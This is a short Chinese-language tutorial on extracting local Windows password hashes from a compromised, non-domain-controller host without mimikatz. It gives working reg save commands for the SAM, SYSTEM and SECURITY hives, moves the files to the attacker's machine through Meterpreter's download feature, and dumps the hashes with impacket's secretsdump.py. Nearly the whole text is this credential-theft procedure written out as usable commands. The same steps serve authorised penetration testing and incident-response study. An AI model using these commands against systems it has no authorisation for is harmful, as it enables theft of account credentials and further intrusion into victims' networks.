0x01 前言
很多環境下,不允許上傳或者使用mimikatz。而針對非域控的單機離線提取hash顯得尤為重要。
在meterpreter shell命令切到交互式cmd命令。
0x02 過程
reg save 方式使得需要下載的目標機
Ps:reg save將指定子項、項的注冊表值的副本保存到指定文件中
我們需要導出的hash文件
reg save HKLM\SYSTEM sys.hiv
reg save HKLM\SAM sam.hiv
reg save hklm\security security.hiv
在meterpreter中使用shell命令來到交互式cmd
這樣在c盤下就導出了三個注冊表文件
返回meterpreter,使用meterpreter下自帶download功能來將目標機的三個注冊表文件下載到攻擊機
下載好了后我們需要讀取目標的hash
用到的工具是impacket的 secretsdump.py。Kali默認路徑:
/root/impacket/examples/secretsdump.py
Ps:Impacket是一個Python類庫,用於對SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP,ARP,IPv4,IPv6,SMB,MSRPC,NTLM,Kerberos,WMI,LDAP等協議進行低級編程訪問。
命令如下:
python /root/impacket/examples/secretsdump.py ‐sam sam.hiv ‐security security.hiv ‐system sys.hiv LOCAL